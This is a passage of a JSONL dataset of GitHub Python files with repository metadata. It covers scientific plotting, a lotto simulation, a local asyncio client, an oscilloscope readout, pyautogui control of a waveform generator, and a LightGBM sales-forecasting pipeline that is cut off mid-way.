plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisaside.mplstyle')\n fig, ax = plt.subplots()\n x = b1s\n y = emins * (Ns ** 0.5)\n ax.plot(x, y, ls='none')\n popt, _ = curve_fit(p1, x, y)\n r2 = r2_score(y, p1(x, *popt))\n print(popt, r2)\n ax.plot(\n x, p1(x, *popt), ls='--', c='k', marker=',',\n label=r'$R^2 = 0.999$')\n ax.set(xlabel=r'$b_{1}$', ylabel=r'$\\varepsilon _{min} N^{1/2}$')\n ax.legend(loc='upper left')\n # plt.savefig('/Users/mk14423/Documents/tempfigs/analytical-bias-emin-vs-b1.png')\n plt.show()\n\n# this is for a fixed B!\ndef analytical_error(E, N, mu, T, sigma):\n # E = 1/BD*0.5\n # err = E / (N**0.5)\n # err = err / T\n # factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n # err = err * factor\n # WHOOPS! NEED TO TRIPPLE CHECK THIS!\n # THIS SHOULD MAYBE BE DIFFEENT NOW!\n # err = E / (N**0.5)\n err = E * T * (N**0.5)\n factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n err = err / factor\n return err\n\ndef analytical_Kfactor(B, N, mu, T, sigma):\n # E = 1/BD*0.5\n # err = E / (N**0.5)\n # err = err / T\n # factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n # err = err * factor\n # WHOOPS! NEED TO TRIPPLE CHECK THIS!\n # THIS SHOULD MAYBE BE DIFFEENT NOW!\n # err = E / (N**0.5)\n K = T / (B * (N ** 0.5))\n factor = ((mu ** 2) / N) + (sigma ** 2)\n K = K / (factor ** 0.5)\n # err = E * T * (N**0.5)\n # factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n # err = err / factor\n return K\n\n\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib.colors import LogNorm\n\nfrom inference.scripts.paper2022May import load\nfrom scipy.ndimage import gaussian_filter\n\ndef analytical_analysis():\n runsN50 = [\n 'B1e4-Nscaling/N50_1', 'B1e4-Nscaling/N50_2', 'B1e4-Nscaling/N50_3',\n 'B1e4-Nscaling/N50_4', 'B1e4-Nscaling/N50_5', 'B1e4-Nscaling/N50_6',\n ]\n runsN100 = [\n 'B1e4-Nscaling/N100_1', 'B1e4-Nscaling/N100_2', 'B1e4-Nscaling/N100_3',\n 'B1e4-Nscaling/N100_4', 'B1e4-Nscaling/N100_5', 'B1e4-Nscaling/N100_6',\n ]\n runsN800 = [\n 'B1e4-Nscaling/N800_1',\n ]\n N = 50\n params, obs, = load.load_PD_fixedB(runsN50, '/Users/mk14423/Desktop/PaperData')\n # params, obs, = load.load_N200_Bfixed_obs('/Users/mk14423/Desktop/PaperData')\n print(params.shape, obs.shape)\n X = params['J']\n Y = params['T']\n error = obs['e']\n # error = gaussian_filter(error, sigma=0.5)\n # error[error > 1.5 * error.min()] = 1.5 * error.min()\n # Z = analytical_error(E=1, N=N, mu=X, T=Y, sigma=1)\n # bias_surface = error * Z\n K = analytical_Kfactor(B=10 ** 4, N=N, mu=X, T=Y, sigma=1)\n # I dont really understand why this doesnt show what I want it to :(\n # bias_surface = error / K\n bias_surface = error / K\n maxfactor = 10\n\n fig = plt.figure()\n gs = fig.add_gridspec(2, 4)\n ax = np.zeros((2, 2))\n ax0 = fig.add_subplot(gs[0, 0:2])\n ax1 = fig.add_subplot(gs[0, 2:])\n ax2 = fig.add_subplot(gs[1:, 0:])\n # ax[0]\n ax = [ax0, ax1, ax2]\n \n im = ax[0].pcolor(\n X, Y, error,\n # norm=LogNorm(vmin=error.min(), vmax=error.max())\n vmin=0.95 * error.min(),\n vmax=maxfactor * error.min()\n )\n im = ax[1].pcolor(\n X, Y, bias_surface,\n # norm=LogNorm(vmin=bias_surface.min(), vmax=bias_surface.max())\n vmin=0.95 * bias_surface.min(),\n vmax=maxfactor * bias_surface.min()\n )\n # fig.colorbar(im, ax=ax[1], label=r'$E$', use_gridspec=True)\n\n ax[0].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon$')\n ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon/K$')\n # ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$')\n\n ax2 = ax[2].twinx()\n cut = 8\n print(X[0:cut, 0])\n e_collapsed = np.mean(error[0:cut, 0:21], axis=0)\n b_collapsed = np.mean(bias_surface[0:cut, 0:21], axis=0)\n print(b_collapsed.shape)\n print(Y[0, 0:21])\n ax[2].plot(Y[0, 0:21], e_collapsed, c=CATCOLS[0])\n ax2.plot(Y[0, 0:21], b_collapsed, c=CATCOLS[1])\n ax[2].set(\n xlabel=r'$T$',\n ylabel=r'$\\varepsilon$',\n ylim=[0.95 * e_collapsed.min(), maxfactor * e_collapsed.min()])\n ax2.set(\n ylabel=r'$Bias=\\epsilon / K$',\n ylim=[0.95 * b_collapsed.min(), maxfactor * b_collapsed.min()])\n # ax.set(yscale='log')\n # ax2.set(yscale='log')\n ax[2].yaxis.label.set_color(CATCOLS[0])\n ax2.yaxis.label.set_color(CATCOLS[1])\n plt.show()\n\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisaside.mplstyle')\n fig, ax = plt.subplots()\n Ts = np.linspace(0.5, 2, 100)\n Ks = analytical_error(E=1, N=N, mu=0, T=Ts, sigma=1)\n # whyyyyyy is it all 1 Lol. FFS!!\n ax.plot(Ts, 1/Ks, marker=',')\n ax.set(xlabel=r'$T$', ylabel=r'$1/K$')\n # plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisaside.mplstyle')\n # plt.savefig('/Users/mk14423/Documents/tempfigs/analytical-bias-asideT.png')\n plt.show()\n\n\ndef analytical_analysis_includingTau():\n runsN50 = [\n 'B1e4-Nscaling/N50_1', 'B1e4-Nscaling/N50_2', 'B1e4-Nscaling/N50_3',\n 'B1e4-Nscaling/N50_4', 'B1e4-Nscaling/N50_5', 'B1e4-Nscaling/N50_6',\n ]\n runsN100 = [\n 'B1e4-Nscaling/N100_1', 'B1e4-Nscaling/N100_2', 'B1e4-Nscaling/N100_3',\n 'B1e4-Nscaling/N100_4', 'B1e4-Nscaling/N100_5', 'B1e4-Nscaling/N100_6',\n ]\n runsN800 = [\n 'B1e4-Nscaling/N800_1',\n ]\n N = 200\n cut = 8\n\n # params, obs, = load.load_PD_fixedB(runsN800, '/Users/mk14423/Desktop/PaperData')\n params, obs, = load.load_N200_Bfixed_obs('/Users/mk14423/Desktop/PaperData')\n print(params.shape, obs.shape)\n X = params['J']\n Y = params['T']\n error = obs['e']\n tau = obs['tau']\n tau[tau < 1] = 1\n B = 1e4 / tau\n plt.plot(Y[0, 0:21], np.mean(tau[0:cut, 0:21], axis=0))\n plt.show()\n\n # FUCK THIS SHIT FOR NOW!\n # error = gaussian_filter(error, sigma=0.5)\n # error[error > 1.5 * error.min()] = 1.5 * error.min()\n Z = analytical_error(E=1, N=N, mu=X, T=Y, sigma=1)\n # Z = Z\n # plt.pcolor(X, Y, Z)\n # plt.show()\n bias_surface = error / Z\n\n\n fig = plt.figure()\n gs = fig.add_gridspec(2, 4)\n ax = np.zeros((2, 2))\n ax0 = fig.add_subplot(gs[0, 0:2])\n ax1 = fig.add_subplot(gs[0, 2:])\n ax2 = fig.add_subplot(gs[1:, 0:])\n # ax[0]\n ax = [ax0, ax1, ax2]\n \n im = ax[0].pcolor(\n X, Y, error,\n # norm=LogNorm(vmin=error.min(), vmax=error.max())\n vmin=0.95 * error.min(),\n vmax=maxfactor * error.min()\n )\n im = ax[1].pcolor(\n X, Y, bias_surface,\n # norm=LogNorm(vmin=bias_surface.min(), vmax=bias_surface.max())\n vmin=0.95 * bias_surface.min(),\n vmax=maxfactor * bias_surface.min()\n )\n # fig.colorbar(im, ax=ax[1], label=r'$E$', use_gridspec=True)\n\n ax[0].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon$')\n ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon/K$')\n # ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$')\n\n ax2 = ax[2].twinx()\n print(X[0:cut, 0])\n e_collapsed = np.mean(error[0:cut, 0:21], axis=0)\n b_collapsed = np.mean(bias_surface[0:cut, 0:21], axis=0)\n print(b_collapsed.shape)\n print(Y[0, 0:21])\n ax[2].plot(Y[0, 0:21], e_collapsed, c=CATCOLS[0])\n ax2.plot(Y[0, 0:21], b_collapsed, c=CATCOLS[1])\n ax[2].set(\n xlabel=r'$T$',\n ylabel=r'$\\varepsilon$',\n ylim=[0.95 * e_collapsed.min(), maxfactor * e_collapsed.min()]\n )\n ax2.set(\n ylabel=r'$Bias=\\epsilon / K$',\n ylim=[0.95 * b_collapsed.min(), maxfactor * b_collapsed.min()]\n )\n # ax.set(yscale='log')\n # ax2.set(yscale='log')\n ax[2].yaxis.label.set_color(CATCOLS[0])\n ax2.yaxis.label.set_color(CATCOLS[1])\n plt.show()\n\n\n\n# this also has some random stuff about the error!!\ngraidents()\n# coalescing_example()\n# coalescing_method()\n# b1_Btilde_N()\n# b1_vs_emin_N()\n# analytical_analysis()\n# analytical_analysis_includingTau()\n# plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n","repo_name":"maxkloucek/neuroimaging-analysis","sub_path":"subsampleSK/convergence_method.py","file_name":"convergence_method.py","file_ext":"py","file_size_in_byte":26849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2019965824","text":"import random\n\nwin = []\nlos = []\ntrafione6 = 0\ntrafione5 = 0\ntrafione4 = 0\ntrafione3 = 0\n\nfor a in range(6):\n win.append(str(random.randint(1, 49)))\n\nx = set(win)\n\nfor b in range(6 * 100000):\n while True:\n liczba = str(random.randint(1, 49))\n if liczba in los:\n pass\n else:\n los.append(liczba)\n break\n if len(los) == 6:\n y = set(los)\n z = x&y\n if len(z) == 6:\n trafione6 += 1\n if len(z) == 5:\n trafione5 += 1\n if len(z) == 4:\n trafione4 += 1\n if len(z) == 3:\n trafione3 += 1\n los.clear()\n\n\nprint(x)\nprint(trafione6)\nprint(trafione5)\nprint(trafione4)\nprint(trafione3)","repo_name":"mateusza-szkolenia/2020-10-10-alx-python","sub_path":"dzien05/rozw_lotto_af.py","file_name":"rozw_lotto_af.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11853965612","text":"import asyncio\nimport aioconsole\n\nasync def main():\n reader, writer = await asyncio.open_connection('127.0.0.1', 8888)\n while True:\n message = await aioconsole.ainput(\"> \")\n writer.write(message.encode() + b'\\n')\n await writer.drain()\n\n response = await reader.readline()\n response_lines = response.decode().strip().split(',')\n for line in response_lines:\n print(line)\n\n if message.strip() == 'exit':\n break\n \n writer.close()\n await writer.wait_closed()\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"NGsHjodra/ITP_3-Python_remote_file_viewer","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22543331588","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/9/14 08:30\n# @Author : zhangsheng\n\n\n# generator 不必创建完整的list,从而节省大量的空间\n\n# 第一种方法很简单,只要把一个列表生成式的[]改成(),就创建了一个generator:\n\ng = (x * x for x in range(10))\nfor value in g:\n print(value)\n\n\ndef fib1(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\nfib1(5)\n\n\n# 如果一个函数定义中包含yield关键字,那么这个函数就不再是一个普通函数,而是一个generator:\n# generator的函数,在每次调用next()的时候执行,遇到yield语句返回,再次执行时从上次返回的yield语句处继续执行。\n\ndef fib2(max):\n n, a, b = 0, 0, 1\n while n < max:\n yield b # 遇到yield语句返回\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\nfib_generator = fib2(5)\nprint('=================')\nprint(next(fib_generator))\nprint(next(fib_generator))\nprint(next(fib_generator))\nprint(next(fib_generator))\nprint('=================')\n# 用for循环调用generator时,发现拿不到generator的return语句的返回值。如果想要拿到返回值,必须捕获StopIteration错误,返回值包含在StopIteration的value中\nfor num in fib2(6):\n print(num)\n # 没有打印return语句的返回值 'done'\n\nfib_g = fib2(6)\nwhile True:\n try:\n print('fib_g_vale:', next(fib_g))\n except StopIteration as e:\n print('return value:', e.value)\n break\n\nprint('=================')\n\n\ndef yield_t(n):\n for i in range(n):\n yield call(i)\n print(\"i=\", i)\n # 做一些其它的事情\n print(\"do something.\")\n print(\"end.\")\n\n\ndef call(i):\n return i * 2\n\n\n# 使用for循环\nfor i in yield_t(5):\n print(i, \",\")\n","repo_name":"zhsheng26/PythonLesson","sub_path":"高级特性/4_生成器.py","file_name":"4_生成器.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72627409820","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nADALM1000\nADC CHA **und** CHB im High Impedance Modus gespeist mit einem externen Signal\nkontinuierlich auslesen und als Live Plot darstellen.\nObjektorientierte Variante mit Trigger.\nBei einem positiven Triggerwert wird beim Überschreien der Triggerschwelle und\nbei einem negativen Triggerwert bei Unterschreiten der Triggerschwelle getriggert.\nhttps://analogdevicesinc.github.io/libsmu/classsmu_1_1Signal.html\n\n24.6.2020, S Mack\n\"\"\"\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom pysmu import Session, Mode\n\nN_S_PTS = 7000 # Number of sampling points\nRED_RATE = 1 # Reduction ratio for displayed sample rate\nTRIG = 3 # Trigger level in Volts, negative: Signal must be smaller\nV_RANGE = [-0.1,5.1] # Vertical Range in Volts\nH_MAX = 5 # Horizontal Range from 0 to this value in Milliseconds\n\n\nclass Scope(object):\n\n def __init__(self, ax, session, h_max, v_range, n_s_pts=400, red_rate=1, mode_a='Hi_Z',mode_b='Hi_Z', trig=0): \n self.ax = ax\n self.n_s_pts = n_s_pts # Number of sampling points\n self.red_rate = red_rate # Reduction ratio of effecive sampling rate\n self.n_d_pts = int(n_s_pts/red_rate) # Number of displayed points\n self.trig = trig # Trigger level in Volts, 0 = no trigger action\n self.x_vals = np.arange(0, self.n_d_pts, 1)*self.red_rate/100 # Sampling times in ms\n self.line_a, = ax.plot(self.x_vals, np.zeros(self.n_d_pts),'-',label='CH A (TRG)')\n self.line_b, = ax.plot(self.x_vals, np.zeros(self.n_d_pts),'-',label='CH B')\n self.ax.set_ylim(v_range[0], v_range[1])\n if(h_max < self.n_d_pts*self.red_rate/100):\n self.ax.set_xlim(-0.5, h_max + 0.5)\n else:\n self.ax.set_xlim(-0.5, self.n_d_pts*self.red_rate/100 + 0.5)\n self.ax.grid(linestyle=':')\n self.ax.legend(loc='lower right')\n self.ax.set(xlabel='Time (ms)', ylabel='Voltage (V)')\n \n self.session = session\n self.dev = session.devices[0]\n chan_a = self.dev.channels['A']\n chan_b = self.dev.channels['B']\n \n if (mode_a == 'Hi_Z'): # Set channel to high impedance mode\n chan_a.mode = Mode.HI_Z \n else:\n print('Mode Channel A not yet supported')\n if (mode_b == 'Hi_Z'): # Set channel to high impedance mode\n chan_b.mode = Mode.HI_Z \n else:\n print('Mode Channel B not yet supported')\n \n self.session.start(0) # Start a continuous session.\n\n def get_samples(self):\n samples = [[],[]]\n # Read NUM_SAM_PTS samples in a blocking fashion (-1), flush surplus samples.\n samples_raw = self.dev.read(self.n_s_pts,timeout=-1, skipsamples=True)\n for x in samples_raw:\n samples[0].append(x[0][0])\n samples[1].append(x[1][0])\n return samples\n\n # returns first index of sampled data with value > val for positive vals\n # and < val for negative vals\n def trigger(self, vals):\n trigger_start = 0 # return 0 in case of no trigger event\n # flatnonzero returns index of nonzero (=True) elements\n if(self.trig > 0): \n thres_indices = np.flatnonzero(np.array(vals) > self.trig)\n else:\n thres_indices = np.flatnonzero(np.array(vals) < -self.trig)\n if (len(thres_indices)>0):\n print('triggered')\n trigger_start = min(thres_indices) # returs index trigger event\n else:\n print('no trigger')\n trigger_start = -1\n return trigger_start\n \n def show_samples(self,vals):\n vals_a = vals[0][:: self.red_rate] # reduce effective sampling rate\n vals_b = vals[1][:: self.red_rate] # reduce effective sampling rate\n if(self.trig != 0): # show only if trigger event\n trigger_start=self.trigger(vals_a) \n if(trigger_start != -1):\n disp_start = max(0, trigger_start - 20) # display 20 pts ahead trigger\n self.line_a.set_data(self.x_vals[:(self.n_d_pts-disp_start)],vals_a[disp_start:])\n self.line_b.set_data(self.x_vals[:(self.n_d_pts-disp_start)],vals_b[disp_start:])\n else:\n self.line_a.set_ydata(vals_a) # plot new values\n self.line_b.set_ydata(vals_b) # plot new values\n \n def yield_samples(self): # Must be iterator and separate method\n while True:\n samples = self.get_samples()\n yield samples \n \n\ntry:\n session = Session()\n if session.devices:\n print('ADALM1000 gefunden...')\n fig, ax = plt.subplots()\n my_scope = Scope(ax,session,H_MAX,V_RANGE,n_s_pts=N_S_PTS, red_rate=RED_RATE, mode_a='Hi_Z', mode_b='Hi_Z', trig=TRIG)\n ani = animation.FuncAnimation(fig, func=my_scope.show_samples, frames=my_scope.yield_samples, interval=50, blit=False)\n plt.show()\n time.sleep(1)\n else:\n print('no devices attached')\n \nexcept KeyboardInterrupt:\n print()\n print('Strg + C erkannt...')\n time.sleep(1)\n \nfinally:\n print('Ende.')\n session.end()\n pass \n","repo_name":"StefanMack/M1K","sub_path":"adalm-scope-chab-trig.py","file_name":"adalm-scope-chab-trig.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"3089493689","text":"import math \na = [.22,-.41,-.16,.03,.23,.23,.28,-.06,-.2,.07,-1.2]\nsdforeachlist = []\nsquaredsd = []\nsumofall = 0\nsdforeach = 0\nsumofallsd = 0\nvariance = 0\nroundedsdforeach = 0\nfor x in a:\n sumofall = sumofall + x\navg = sumofall/len(a)\nroundavg = round(avg,1)\nfor x in a:\n sdforeach = x - roundavg\n roundedsdforeach=round(sdforeach,1)\n sdsquared = pow(roundedsdforeach,2)\n sdforeachlist.append(sdsquared)\nfor x in sdforeachlist:\n sumofallsd = sumofallsd + x\nvariance = sumofallsd / (len(a)-1)\nprint(round(math.sqrt(variance),2))","repo_name":"juansantiagobarragan/standard_deviation","sub_path":"standard_deviation.py","file_name":"standard_deviation.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43316633316","text":"# Th screen Resolution is 1366x768\r\nimport pyautogui\r\nimport visa\r\nimport time\r\nimport numpy as np\r\nfrom struct import unpack\r\nimport csv\r\n\r\n#pyautogui.PAUSE=1 #Just a pausing command\r\n\r\ndef setvoltage(vbase, vpulse, ch):\r\n pyautogui.click(190,70) # Stop the current AFG run\r\n \r\n #Double click on Waveform Sequencer for specified channel no \r\n pyautogui.click(100,150+(ch-1)*65) \r\n pyautogui.click(100,150+(ch-1)*65)\r\n# time.delay(0.2)\r\n \r\n pyautogui.click(300,230) #Double click waveform properties\r\n pyautogui.click(300,230)\r\n \r\n pyautogui.click(960,140) #Setting vpulse\r\n pyautogui.typewrite(str(vpulse),interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(960,175) # Setting vbase\r\n pyautogui.typewrite(str(vbase),interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(780,140) # Setting amplitude\r\n pyautogui.typewrite(str((vpulse-vbase)/2),interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(930,640) # Clicking ok button\r\n \r\n pyautogui.click(190,70) # Start the next AFG run\r\n return\r\n\r\n\r\ndef settriggerdelay(t, ch): # t to be set in !NANOSECONDS!\r\n pyautogui.click(190,70) # Stop the current AFG run\r\n \r\n #Double click on Setting for specified channel no \r\n pyautogui.click(100,130+(ch-1)*65) \r\n pyautogui.click(100,130+(ch-1)*65)\r\n# time.delay(0.2)\r\n \r\n pyautogui.click(700,260) # Click Trigger Delay box\r\n pyautogui.typewrite(str(t),interval=0.1)# Enter time in NANOSECONDS\r\n pyautogui.typewrite('n',interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(900,570) # Clicking ok button\r\n \r\n pyautogui.click(190,70) # Start the next AFG run\r\n return\r\n\r\ndef togglechannel(ch):\r\n pyautogui.click(190,70) # Stop the current AFG run\r\n \r\n pyautogui.click(250+(ch-1)*60,70)# Toggle the channel \r\n \r\n pyautogui.click(190,70) # Start the next AFG run\r\n return\r\n\r\n\r\ndef savedatacsv(scope, ch, filename):\r\n s=\"\"\r\n scope.write(s.join(('DATA:SOU CH',str(ch)))) #Set Data source Channel\r\n scope.write('DATA:WIDTH 1') # Set Data width\r\n scope.write('DATA:ENC RPB') # Set data encoding\r\n \r\n ymult = float(scope.query('WFMPRE:YMULT?')) # Pre-digitising level\r\n yzero = float(scope.query('WFMPRE:YZERO?')) # Offset, if any\r\n yoff = float(scope.query('WFMPRE:YOFF?')) # Related to trace position on screen\r\n xincr = float(scope.query('WFMPRE:XINCR?'))# Time increment in sampling (x axis)\r\n \r\n scope.write('CURVE?')\r\n data = scope.read_raw()\r\n headerlen = 2 + int(data[1])\r\n header = data[:headerlen]\r\n ADC_wave = data[headerlen:-1]\r\n \r\n ADC_wave = np.array(unpack('%sB' % len(ADC_wave),ADC_wave))\r\n \r\n Volts = (ADC_wave - yoff) * ymult + yzero\r\n \r\n Time = np.arange(0, xincr * len(Volts), xincr)\r\n \r\n savefile=s.join((filename,'.csv'))\r\n with open(savefile,'w') as file:\r\n writer= csv.writer(file, delimiter=',') \r\n #writer.writerow([]) #Repair this row to display the Vpre and Vcoll in the csv file too.\r\n for i in range(0,len(Time)):\r\n if i==0:\r\n writer.writerow(['Time','Volts'])\r\n else:\r\n writer.writerow([str(Time[i]),str(Volts[i])]) \r\n return","repo_name":"sumukhvaidya/TDCF","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"23015184418","text":"from datetime import datetime, timedelta\nimport gc\nimport numpy as np, pandas as pd\nimport lightgbm as lgb\n#import xgboost as xgb\n\nCAL_DTYPES={\"event_name_1\": \"category\", \"event_name_2\": \"category\", \"event_type_1\": \"category\", \n \"event_type_2\": \"category\", \"weekday\": \"category\", 'wm_yr_wk': 'int16', \"wday\": \"int16\",\n \"month\": \"int16\", \"year\": \"int16\", \"snap_CA\": \"float32\", 'snap_TX': 'float32', 'snap_WI': 'float32' }\n\nPRICE_DTYPES = {\"store_id\": \"category\", \"item_id\": \"category\", \"wm_yr_wk\": \"int16\",\"sell_price\":\"float32\" }\n\nh = 28 \nmax_lags = 43\nFIRST_DAY = 500\ntr_last = 1941\nfday = datetime(2016,5,23) \nfday_prev = datetime(2016,4,25)\nfday_prev_list = [fday_prev+timedelta(i) for i in range(h)]\n#store_number = 8\n\ndef create_dt(is_train = True, nrows = None, first_day = 1200):\n \n # prices\n prices = pd.read_csv(\"kaggle/input/m5-forecasting-accuracy/sell_prices.csv\", dtype = PRICE_DTYPES)\n \n prices['price_max'] = prices.groupby(['store_id','item_id'])['sell_price'].transform('max')\n prices['price_norm'] = prices['sell_price']/prices['price_max']\n del prices['price_max']\n \n prices['price_avg'] = prices.groupby(['store_id','item_id'])['sell_price'].transform('mean')\n #prices['price_nunique'] = prices.groupby(['store_id','item_id'])['sell_price'].transform('nunique')\n del prices['sell_price']\n \n for col, col_dtype in PRICE_DTYPES.items():\n if col_dtype == \"category\":\n prices[col] = prices[col].cat.codes.astype(\"int16\")\n prices[col] -= prices[col].min()\n \n # calender \n cal = pd.read_csv(\"kaggle/input/m5-forecasting-accuracy/calendar.csv\", dtype = CAL_DTYPES)\n cal[\"date\"] = pd.to_datetime(cal[\"date\"])\n \n for col, col_dtype in CAL_DTYPES.items():\n if col_dtype == \"category\":\n cal[col] = cal[col].cat.codes.astype(\"int16\")\n cal[col] -= cal[col].min()\n \n start_day = max(1 if is_train else tr_last - max_lags, first_day)\n numcols = [f\"d_{day}\" for day in range(start_day,tr_last + 1)]\n \n catcols = ['id', 'item_id', 'dept_id','store_id', 'cat_id', 'state_id']\n dtype = {numcol:\"float32\" for numcol in numcols} \n dtype.update({col: \"category\" for col in catcols if col != \"id\"})\n dt = pd.read_csv(\"kaggle/input/m5-forecasting-accuracy/sales_train_evaluation.csv\", \n nrows = nrows, usecols = catcols + numcols, dtype = dtype)\n \n # store ids\n #STORES_IDS = dt['dept_id']\n #STORES_IDS = list(STORES_IDS.unique())\n #store = STORES_IDS[store_num]\n #print(store)\n #dt = dt[dt['store_id'] == 'CA_1']\n \n # continue\n for col in catcols:\n if col != \"id\":\n dt[col] = dt[col].cat.codes.astype(\"int16\")\n dt[col] -= dt[col].min()\n \n if is_train == False:\n for day in range(tr_last + 1, tr_last + 28 + 1):\n dt[f\"d_{day}\"] = np.nan\n \n dt = pd.melt(dt,\n id_vars = catcols,\n value_vars = [col for col in dt.columns if col.startswith(\"d_\")],\n var_name = \"d\",\n value_name = \"sales\")\n \n dt = dt.merge(cal, on= \"d\", copy = False)\n dt = dt.merge(prices, on = [\"store_id\", \"item_id\", \"wm_yr_wk\"], copy = False)\n \n return dt\n\n\ndef create_fea(dt):\n \n lags_1 = [1, 2, 3, 7, 14, 21]\n \n lag_cols = [f\"lag_{lag}\" for lag in lags_1 ]\n for lag, lag_col in zip(lags_1, lag_cols):\n dt[lag_col] = dt[[\"id\",\"sales\"]].groupby(\"id\")[\"sales\"].shift(lag)\n \n lags_2 = [1, 2, 3, 7, 14]\n wins = [7, 28]\n for win in wins :\n for lag,lag_col in zip(lags_2, lag_cols):\n dt[f\"rmean_{lag}_{win}\"] = dt[[\"id\", lag_col]].groupby(\"id\")[lag_col].transform(lambda x : x.rolling(win).mean())\n \n #for lag in [7, 28]: # shift 1 day and std\n # dt['lag_1_' + 'std_' + str(lag)] = dt.groupby(['id'])['sales'].transform(lambda x: x.shift(1).rolling(lag).std()).astype(np.float16)\n \n #for lag in lags_1[:3]: # shop mean \n # dt['shop_lag_'+ str(lag) + '_mean' ] = dt.groupby(['store_id','d'])['lag_' + str(lag)].transform('mean').astype(np.float16)\n \n \n date_features = {\n \n \"wday\": \"weekday\",\n \"week\": \"weekofyear\",\n \"month\": \"month\",\n \"quarter\": \"quarter\",\n \"year\": \"year\",\n \"mday\": \"day\",\n }\n \n# dt.drop([\"d\", \"wm_yr_wk\", \"weekday\"], axis=1, inplace = True)\n \n for date_feat_name, date_feat_func in date_features.items():\n if date_feat_name in dt.columns:\n dt[date_feat_name] = dt[date_feat_name].astype(\"int16\")\n else:\n dt[date_feat_name] = getattr(dt[\"date\"].dt, date_feat_func).astype(\"int16\")\n \n dt['year'] = dt['year'] - 2011\n\n\ndf = create_dt(is_train=True, first_day= FIRST_DAY)\n\ncreate_fea(df)\n\ndf.dropna(inplace = True)\nprint(df.shape)\n \n#print(df['year'].unique())\n\n\n#gamma = 0.997\n#to_map = [pow(gamma,tr_last-i) for i in range(1,tr_last+1)]\n\nclass_mapping = {}\nfor i in range(1,tr_last+1):\n class_mapping['d_'+str(i)] = i\n #to_map = pow(gamma,tr_last-i)\n #class_mapping['d_'+str(i)] = pow(gamma,tr_last-i)\n \n \ndf['d'] = df['d'].map(class_mapping)\n\n#valid_data_last_days = df[df['d'] > 1850]\n# use weight as log(passed day)\ndf['d'] = df['d'].apply(np.log)\n#df['d'] = df['d']\n#print(df['d'].unique())\nw = df['d']/df['d'].max()\n\n#print(valid_data_last_days.shape)\n\ncat_feats = ['item_id', 'dept_id','store_id', 'cat_id', 'state_id'] + [\"event_name_1\", \"event_name_2\", \"event_type_1\", \"event_type_2\"]\nuseless_cols = [\"id\", \"date\", \"sales\",\"d\", \"wm_yr_wk\", \"weekday\"]\ntrain_cols = df.columns[~df.columns.isin(useless_cols)]\n\n#df.to_pickle('data/train_data.pkl')\n\n\nX_train = df[train_cols]\ny_train = df[\"sales\"]\n\n\n\n#valid_data_last_days_train = valid_data_last_days[train_cols]\n#valid_data_last_days_ytrain = valid_data_last_days['sales']\n\n######################\n#use_model = 'lgb'\n######################\n\n#np.random.seed(666)\n#num_rounds = 1000\n\nfake_valid_inds = np.random.choice(X_train.index.values, 2000000, replace = False)\ntrain_inds = np.setdiff1d(X_train.index.values, fake_valid_inds)\n\n\n\ntrain_data = lgb.Dataset(X_train.loc[train_inds] , label = y_train.loc[train_inds], \n categorical_feature=cat_feats, free_raw_data=False,weight = w.loc[train_inds])\n\nfake_valid_data = lgb.Dataset(X_train.loc[fake_valid_inds], label = y_train.loc[fake_valid_inds],\n categorical_feature=cat_feats,#weight = w.loc[fake_valid_inds],\n free_raw_data = False)# This is a random sample, we're not gonna apply any time series train-test-split tricks here!\n\n#fake_valid_data = lgb.Dataset(valid_data_last_days_train, label = valid_data_last_days_ytrain,\n# categorical_feature=cat_feats,#weight = w.loc[fake_valid_inds],\n# free_raw_data = False)\n\ndel df, X_train, y_train, fake_valid_inds,train_inds ; gc.collect()\n\n\nparams = {\n #\"objective\" : \"poisson\",\n 'objective': 'tweedie',\n 'tweedie_variance_power': 1.2,\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 